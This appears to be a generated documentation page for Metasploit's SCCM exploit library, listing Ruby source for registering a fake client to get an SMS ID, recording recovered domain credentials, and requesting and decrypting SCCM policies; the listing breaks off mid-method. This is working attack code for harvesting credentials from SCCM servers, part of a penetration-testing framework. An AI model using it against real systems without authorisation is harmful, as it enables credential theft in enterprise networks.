<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Content-Type</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>multipart/mixed; boundary=&quot;aAbBcCdDv1234567890VxXyYzZ&quot;</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_response'>http_response</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_raw'>send_request_raw</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#Unreachable-constant" title="Msf::Module::Failure::Unreachable (constant)">Unreachable</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>No response from server</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_ip_address'>ip_address</span> <span class='op'>=</span> <span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_peerinfo'>peerinfo</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>addr</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>MIME</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_html_doc'>html_doc</span> <span class='op'>=</span> <span class='const'>Nokogiri</span><span class='op'>::</span><span class='const'>HTML</span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='id identifier rubyid_error'>error</span> <span class='op'>=</span> <span class='id identifier rubyid_html_doc'>html_doc</span><span class='period'>.</span><span class='id identifier rubyid_xpath'>xpath</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>//title</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_text'>text</span>
<span class='kw'>if</span> <span class='id identifier rubyid_error'>error</span><span class='period'>.</span><span class='id identifier rubyid_blank?'>blank?</span>
<span class='id identifier rubyid_error'>error</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Bad response from server</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_dlog'><span class='object_link'><a href="../../../../top-level-namespace.html#dlog-instance_method" title="#dlog (method)">dlog</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Response from server:</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_dlog'><span class='object_link'><a href="../../../../top-level-namespace.html#dlog-instance_method" title="#dlog (method)">dlog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='id identifier rubyid_error'>error</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_content'>content</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_delete_prefix'>delete_prefix</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\uFEFF</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_compressed_response'>compressed_response</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_zlib_inflate'>zlib_inflate</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_parts'>parts</span><span class='lbracket'>[</span><span class='int'>1</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_content'>content</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_xml_doc'>xml_doc</span> <span class='op'>=</span> <span class='const'>Nokogiri</span><span class='op'>::</span><span class='const'>XML</span><span class='lparen'>(</span><span class='id identifier rubyid_compressed_response'>compressed_response</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span> <span class='comment'># It&#39;s crazy, but XML parsing doesn&#39;t work with UTF-16-encoded strings
</span> <span class='id identifier rubyid_sms_id'>sms_id</span> <span class='op'>=</span> <span class='id identifier rubyid_xml_doc'>xml_doc</span><span class='period'>.</span><span class='id identifier rubyid_root'>root</span><span class='op'>&amp;.</span><span class='id identifier rubyid_attributes'>attributes</span><span class='op'>&amp;.</span><span class='op'>[]</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SMSID</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='op'>&amp;.</span><span class='id identifier rubyid_value'>value</span><span class='op'>&amp;.</span><span class='id identifier rubyid_delete_prefix'>delete_prefix</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GUID:</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_approval'>approval</span> <span class='op'>=</span> <span class='id identifier rubyid_xml_doc'>xml_doc</span><span class='period'>.</span><span class='id identifier rubyid_root'>root</span><span class='op'>&amp;.</span><span class='id identifier rubyid_attributes'>attributes</span><span class='op'>&amp;.</span><span class='op'>[]</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ApprovalStatus</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='op'>&amp;.</span><span class='id identifier rubyid_value'>value</span>
<span class='kw'>if</span> <span class='id identifier rubyid_approval'>approval</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>-1</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Client registration not approved by SCCM server</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Did not retrieve SMS ID</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Got SMS ID: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='lbracket'>[</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_ip_address'>ip_address</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
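<div class="method_details ">
  <h3 class="signature " id="report_creds-instance_method">
    #<strong>report_creds</strong>(ip_address, user, password) &#x21d2; <tt>Object</tt>
  </h3>
  <!-- Docstring added in review: the generated page had no description for this method.
       Every statement below is taken from the source listing in this block. -->
  <div class="docstring">
    <div class="discussion">
      <p>Record a recovered username and password in the credential store of the current workspace, attached to the <code>sccm</code> service on TCP port <code>rport</code> of <code>ip_address</code>.</p>
      <p><code>user</code> is split on the backslash into an Active Directory domain (stored as the realm) and an account name (stored as the username). The password is stored in cleartext as a <code>:password</code> private, and the login is created with status <code>UNTRIED</code>, so the pair is recorded without having been verified against the service.</p>
      <p>A <code>user</code> value with no backslash is not handled separately: the whole string becomes the realm and the username is <code>nil</code>. Pass <code>DOMAIN\account</code>.</p>
    </div>
  </div>
  <div class="tags">
  </div>
  <table class="source_code">
    <tr>
      <td>
        <pre class="lines">
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380</pre>
      </td>
      <td>
        <!-- Ruby indentation restored below; the tokens themselves are unchanged. -->
        <pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 353</span>
<span class='kw'>def</span> <span class='id identifier rubyid_report_creds'>report_creds</span><span class='lparen'>(</span><span class='id identifier rubyid_ip_address'>ip_address</span><span class='comma'>,</span> <span class='id identifier rubyid_user'>user</span><span class='comma'>,</span> <span class='id identifier rubyid_password'>password</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_service_data'>service_data</span> <span class='op'>=</span> <span class='lbrace'>{</span>
    <span class='label'>address:</span> <span class='id identifier rubyid_ip_address'>ip_address</span><span class='comma'>,</span>
    <span class='label'>port:</span> <span class='id identifier rubyid_rport'>rport</span><span class='comma'>,</span>
    <span class='label'>protocol:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>tcp</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
    <span class='label'>service_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>sccm</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
    <span class='label'>workspace_id:</span> <span class='id identifier rubyid_myworkspace_id'>myworkspace_id</span>
  <span class='rbrace'>}</span>
  <span class='id identifier rubyid_domain'>domain</span><span class='comma'>,</span> <span class='id identifier rubyid_account'>account</span> <span class='op'>=</span> <span class='id identifier rubyid_user'>user</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\\</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
  <span class='id identifier rubyid_credential_data'>credential_data</span> <span class='op'>=</span> <span class='lbrace'>{</span>
    <span class='label'>origin_type:</span> <span class='symbol'>:service</span><span class='comma'>,</span>
    <span class='label'>module_fullname:</span> <span class='id identifier rubyid_fullname'>fullname</span><span class='comma'>,</span>
    <span class='label'>username:</span> <span class='id identifier rubyid_account'>account</span><span class='comma'>,</span>
    <span class='label'>private_data:</span> <span class='id identifier rubyid_password'>password</span><span class='comma'>,</span>
    <span class='label'>private_type:</span> <span class='symbol'>:password</span><span class='comma'>,</span>
    <span class='label'>realm_key:</span> <span class='const'><span class='object_link'><a href="../../../../Metasploit.html" title="Metasploit (module)">Metasploit</a></span></span><span class='op'>::</span><span class='const'>Model</span><span class='op'>::</span><span class='const'>Realm</span><span class='op'>::</span><span class='const'>Key</span><span class='op'>::</span><span class='const'>ACTIVE_DIRECTORY_DOMAIN</span><span class='comma'>,</span>
    <span class='label'>realm_value:</span> <span class='id identifier rubyid_domain'>domain</span>
  <span class='rbrace'>}</span>
  <span class='id identifier rubyid_credential_core'>credential_core</span> <span class='op'>=</span> <span class='id identifier rubyid_create_credential'>create_credential</span><span class='lparen'>(</span><span class='id identifier rubyid_credential_data'>credential_data</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='id identifier rubyid_service_data'>service_data</span><span class='rparen'>)</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_login_data'>login_data</span> <span class='op'>=</span> <span class='lbrace'>{</span>
    <span class='label'>core:</span> <span class='id identifier rubyid_credential_core'>credential_core</span><span class='comma'>,</span>
    <span class='label'>status:</span> <span class='const'><span class='object_link'><a href="../../../../Metasploit.html" title="Metasploit (module)">Metasploit</a></span></span><span class='op'>::</span><span class='const'>Model</span><span class='op'>::</span><span class='const'>Login</span><span class='op'>::</span><span class='const'>Status</span><span class='op'>::</span><span class='const'>UNTRIED</span>
  <span class='rbrace'>}</span>
  <span class='id identifier rubyid_create_credential_login'>create_credential_login</span><span class='lparen'>(</span><span class='id identifier rubyid_login_data'>login_data</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='id identifier rubyid_service_data'>service_data</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
      </td>
    </tr>
  </table>
</div>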
<div class="method_details ">
<h3 class="signature " id="request_policy-instance_method">
#<strong>request_policy</strong>(http_opts, policy_url, sms_id, key) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Request the policy from the policy_url</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 179</span>
<span class='kw'>def</span> <span class='id identifier rubyid_request_policy'>request_policy</span><span class='lparen'>(</span><span class='id identifier rubyid_http_opts'>http_opts</span><span class='comma'>,</span> <span class='id identifier rubyid_policy_url'>policy_url</span><span class='comma'>,</span> <span class='id identifier rubyid_sms_id'>sms_id</span><span class='comma'>,</span> <span class='id identifier rubyid_key'>key</span><span class='rparen'>)</span>
<span class='id identifier rubyid_policy_url'>policy_url</span><span class='period'>.</span><span class='id identifier rubyid_gsub!'>gsub!</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>%r{</span><span class='tstring_content'>^https?://&lt;mp&gt;</span><span class='regexp_end'>}</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_policy_url'>policy_url</span> <span class='op'>=</span> <span class='id identifier rubyid_policy_url'>policy_url</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>{</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>%7B</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>}</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>%7D</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_now'>now</span> <span class='op'>=</span> <span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_utc'>utc</span><span class='period'>.</span><span class='id identifier rubyid_iso8601'>iso8601</span>
<span class='id identifier rubyid_client_token'>client_token</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>GUID:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_sms_id'>sms_id</span><span class='embexpr_end'>}</span><span class='tstring_content'>;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_now'>now</span><span class='embexpr_end'>}</span><span class='tstring_content'>;2</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_client_signature'>client_signature</span> <span class='op'>=</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='lparen'>(</span><span class='id identifier rubyid_client_token'>client_token</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_bytes'>bytes</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>C*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='id identifier rubyid_http_opts'>http_opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_policy_url'>policy_url</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ClientToken</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_client_token'>client_token</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ClientTokenSignature</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_client_signature'>client_signature</span>
<span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_response'>http_response</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_raw'>send_request_raw</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
<span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_gzip_decode!'>gzip_decode!</span>
<span class='id identifier rubyid_ci'>ci</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/Cms.html" title="Rex::Proto::CryptoAsn1::Cms (module)">Cms</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/Cms/ContentInfo.html" title="Rex::Proto::CryptoAsn1::Cms::ContentInfo (class)">ContentInfo</a></span></span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_http_response'>http_response</span><span class='period'>.</span><span class='id identifier rubyid_body'>body</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cms_envelope'>cms_envelope</span> <span class='op'>=</span> <span class='id identifier rubyid_ci'>ci</span><span class='period'>.</span><span class='id identifier rubyid_enveloped_data'>enveloped_data</span>
<span class='id identifier rubyid_ri'>ri</span> <span class='op'>=</span> <span class='id identifier rubyid_cms_envelope'>cms_envelope</span><span class='lbracket'>[</span><span class='symbol'>:recipient_infos</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_ri'>ri</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>No recipient infos provided</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_ri'>ri</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:ktri</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>KeyTransRecipientInfo not found</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_body'>body</span> <span class='op'>=</span> <span class='id identifier rubyid_cms_envelope'>cms_envelope</span><span class='lbracket'>[</span><span class='symbol'>:encrypted_content_info</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:encrypted_content</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='id identifier rubyid_key_encryption_alg'>key_encryption_alg</span> <span class='op'>=</span> <span class='id identifier rubyid_ri'>ri</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:ktri</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:key_encryption_algorithm</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:algorithm</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='id identifier rubyid_encrypted_rsa_key'>encrypted_rsa_key</span> <span class='op'>=</span> <span class='id identifier rubyid_ri'>ri</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:ktri</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:encrypted_key</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='kw'>if</span> <span class='id identifier rubyid_key_encryption_alg'>key_encryption_alg</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html" title="Rex::Proto::CryptoAsn1::OIDs (class)">OIDs</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#OID_RSA_ENCRYPTION-constant" title="Rex::Proto::CryptoAsn1::OIDs::OID_RSA_ENCRYPTION (constant)">OID_RSA_ENCRYPTION</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#value-class_method" title="Rex::Proto::CryptoAsn1::OIDs.value (method)">value</a></span></span>
<span class='id identifier rubyid_decrypted_key'>decrypted_key</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_private_decrypt'>private_decrypt</span><span class='lparen'>(</span><span class='id identifier rubyid_encrypted_rsa_key'>encrypted_rsa_key</span><span class='rparen'>)</span>
